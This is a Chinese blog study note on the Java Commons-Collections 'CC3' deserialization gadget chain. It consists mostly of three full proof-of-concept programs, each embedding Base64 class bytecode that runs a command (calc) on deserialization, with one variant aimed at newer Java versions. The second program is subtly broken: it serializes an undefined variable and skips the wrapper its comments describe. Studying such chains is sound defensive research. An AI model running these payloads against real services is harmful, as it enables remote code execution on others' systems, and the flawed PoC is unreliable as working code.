Error message here!

Hide Error message here!

忘记密码?

Error message here!

请输入正确邮箱

Hide Error message here!

密码丢失?请输入您的电子邮件地址。您将收到一个重设密码链接。

Error message here!

返回登录

Close

Javaweb安全学习——反序列化漏洞-CC3链

Arnoldqqq 2022-07-06 19:07:35 阅读数:329 评论数:0 点赞数:0 收藏数:0

CommonCollections3

CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用链。

上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调链替换掉变成直接加载字节码。

先来看一个demo:

//jdk7u80
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CommonsCollections3 {

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {

Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception {

byte[] code = Base64.decodeBase64("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMc2VyL2V2YWxDbGFzc1RlbXBsYXRlc0ltcGw7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHACkBAApTb3VyY2VGaWxlAQAbZXZhbENsYXNzVGVtcGxhdGVzSW1wbC5qYXZhDAAJAAoHAC4MAC8AMAEABGNhbGMMADEAMgEAE2phdmEvbGFuZy9FeGNlcHRpb24MADMACgEAGnNlci9ldmFsQ2xhc3NUZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAQAAQAJAAoAAQALAAAALwABAAEAAAAFKrcAAbEAAAACAAwAAAAGAAEAAAAJAA0AAAAMAAEAAAAFAA4ADwAAAAEAEAARAAIACwAAAD8AAAADAAAAAbEAAAACAAwAAAAGAAEAAAAVAA0AAAAgAAMAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAFAAVAAIAFgAAAAQAAQAXAAEAEAAYAAIACwAAAEkAAAAEAAAAAbEAAAACAAwAAAAGAAEAAAAaAA0AAAAqAAQAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAGQAaAAIAAAABABsAHAADABYAAAAEAAEAFwAIAB0ACgABAAsAAABhAAIAAQAAABK4AAISA7YABFenAAhLKrYABrEAAQAAAAkADAAFAAMADAAAABYABQAAAAwACQAPAAwADQANAA4AEQAQAA0AAAAMAAEADQAEAB4AHwAAACAAAAAHAAJMBwAhBAABACIAAAACACM=");
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][] {
code});
setFieldValue(obj, "_name", "test");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{

new ConstantTransformer(obj),
new InvokerTransformer("newTransformer", null, null),
};
Transformer transformerChain = new ChainedTransformer(transformers);
//包装innerMap,回调TransformedMap.decorate
Map innerMap = new HashMap();
innerMap.put("value", "xxxx");
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
//触发回调
//outerMap.put("test", "xxxx");
//反射调用AnnotationInvocationHandle
Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
construct.setAccessible(true);
Object obj1 = construct.newInstance(Retention.class, outerMap);
//生成序列化数据
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(obj1);
oos.close();
System.out.println(barr);
//反序列化
ByteArrayInputStream in = new ByteArrayInputStream(barr.toByteArray());
ObjectInputStream ois = new ObjectInputStream(in);
ois.readObject();
}
}

由CommonsCollections1 AnnotationInvocationHandler这个POC修改而来,这时还是使用了InvokerTransformer只不过将执行的回调链改成TemplatesImpl::newTransformer()。

ysoserial当中的CommonsCollections3使用 com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter这个类,这个类的构造方法中调用了 (TransformerImpl) templates.newTransformer(),代替了InvokerTransformer调用newTransformer()

image-20220702012110146

这时还需要一个实现了Transformer接口的类,去调用TrAXFilter的构造方法。这里用的是 org.apache.commons.collections.functors.InstantiateTransformer,其transform方法也调用了构造方法。

image-20220702012347873

得到POC:

//jdk7u80
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CommonsCollections3 {

public static void main(String[] args) throws Exception {

byte[] code = Base64.decodeBase64("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMc2VyL2V2YWxDbGFzc1RlbXBsYXRlc0ltcGw7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHACkBAApTb3VyY2VGaWxlAQAbZXZhbENsYXNzVGVtcGxhdGVzSW1wbC5qYXZhDAAJAAoHAC4MAC8AMAEABGNhbGMMADEAMgEAE2phdmEvbGFuZy9FeGNlcHRpb24MADMACgEAGnNlci9ldmFsQ2xhc3NUZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAQAAQAJAAoAAQALAAAALwABAAEAAAAFKrcAAbEAAAACAAwAAAAGAAEAAAAJAA0AAAAMAAEAAAAFAA4ADwAAAAEAEAARAAIACwAAAD8AAAADAAAAAbEAAAACAAwAAAAGAAEAAAAVAA0AAAAgAAMAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAFAAVAAIAFgAAAAQAAQAXAAEAEAAYAAIACwAAAEkAAAAEAAAAAbEAAAACAAwAAAAGAAEAAAAaAA0AAAAqAAQAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAGQAaAAIAAAABABsAHAADABYAAAAEAAEAFwAIAB0ACgABAAsAAABhAAIAAQAAABK4AAISA7YABFenAAhLKrYABrEAAQAAAAkADAAFAAMADAAAABYABQAAAAwACQAPAAwADQANAA4AEQAQAA0AAAAMAAEADQAEAB4AHwAAACAAAAAHAAJMBwAhBAABACIAAAACACM=");
TemplatesImpl templatesImpl = new TemplatesImpl();
setFieldValue(templatesImpl, "_bytecodes", new byte[][] {
code});
setFieldValue(templatesImpl, "_name", "test");
setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{

new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] {
 Templates.class },
new Object[] {
 templatesImpl } ),
};
Transformer transformerChain = new ChainedTransformer(transformers);
//包装innerMap,回调TransformedMap.decorate
Map innerMap = new HashMap();
innerMap.put("value", "xxxx");
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
//触发回调
//outerMap.put("test", "xxxx");
//反射调用AnnotationInvocationHandle
setFieldValue(transformerChain, "iTransformers", transformers);
//生成序列化数据
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(obj);
oos.close();
System.out.println(barr);
//反序列化
ByteArrayInputStream in = new ByteArrayInputStream(barr.toByteArray());
ObjectInputStream ois = new ObjectInputStream(in);
ois.readObject();
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {

Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
}

高版本触发(Java 8u71以上)

这个poc还有一个问题就是高版本无法触发,再修改一下使用CC6后半部分。

//jdk8u111
package ser;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CommonsCollections3 {

public static void main(String[] args) throws Exception {

byte[] code = Base64.decodeBase64("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMc2VyL2V2YWxDbGFzc1RlbXBsYXRlc0ltcGw7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHACkBAApTb3VyY2VGaWxlAQAbZXZhbENsYXNzVGVtcGxhdGVzSW1wbC5qYXZhDAAJAAoHAC4MAC8AMAEABGNhbGMMADEAMgEAE2phdmEvbGFuZy9FeGNlcHRpb24MADMACgEAGnNlci9ldmFsQ2xhc3NUZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAQAAQAJAAoAAQALAAAALwABAAEAAAAFKrcAAbEAAAACAAwAAAAGAAEAAAAJAA0AAAAMAAEAAAAFAA4ADwAAAAEAEAARAAIACwAAAD8AAAADAAAAAbEAAAACAAwAAAAGAAEAAAAVAA0AAAAgAAMAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAFAAVAAIAFgAAAAQAAQAXAAEAEAAYAAIACwAAAEkAAAAEAAAAAbEAAAACAAwAAAAGAAEAAAAaAA0AAAAqAAQAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAGQAaAAIAAAABABsAHAADABYAAAAEAAEAFwAIAB0ACgABAAsAAABhAAIAAQAAABK4AAISA7YABFenAAhLKrYABrEAAQAAAAkADAAFAAMADAAAABYABQAAAAwACQAPAAwADQANAA4AEQAQAA0AAAAMAAEADQAEAB4AHwAAACAAAAAHAAJMBwAhBAABACIAAAACACM=");
TemplatesImpl templatesImpl = new TemplatesImpl();
setFieldValue(templatesImpl, "_bytecodes", new byte[][] {
code});
setFieldValue(templatesImpl, "_name", "test");
setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{

new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] {
 Templates.class },
new Object[] {
 templatesImpl } ),
};
//包装innerMap,回调TransformedMap.decorate
//防止payload生成过程中触发,先放进去一个空的Transform
Transformer[] fakeTransformers = new Transformer[] {
new ConstantTransformer(1)};
Transformer transformerChain = new ChainedTransformer(fakeTransformers);
Map innerMap = new HashMap();
Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
Map expMap = new HashMap();
expMap.put(entry, "valuevalue");
//移除entry那lazyMap的键
lazyMap.remove("foo");
//通过反射将真正的恶意Transform放进去
setFieldValue(transformerChain, "iTransformers", transformers);
//生成序列化数据
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(expMap);
oos.close();
//System.out.println(barr);
//反序列化
ByteArrayInputStream in = new ByteArrayInputStream(barr.toByteArray());
ObjectInputStream ois = new ObjectInputStream(in);
ois.readObject();
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {

Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
}

image-20220630231513559

有的文章中也提到下面这句代码可以去掉

setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());

原因是该属性无法被序列化,而且在该类的readobject方法中会对这属性进行初始化设置值,防止其为空值报错。

image-20220630230704967

image-20220630230932815

在缩小payload长度时可以利用这一点。

版权声明
本文为[Arnoldqqq]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_43610673/article/details/125631381

飞链云3D数字艺术品
30万现金开奖等你来领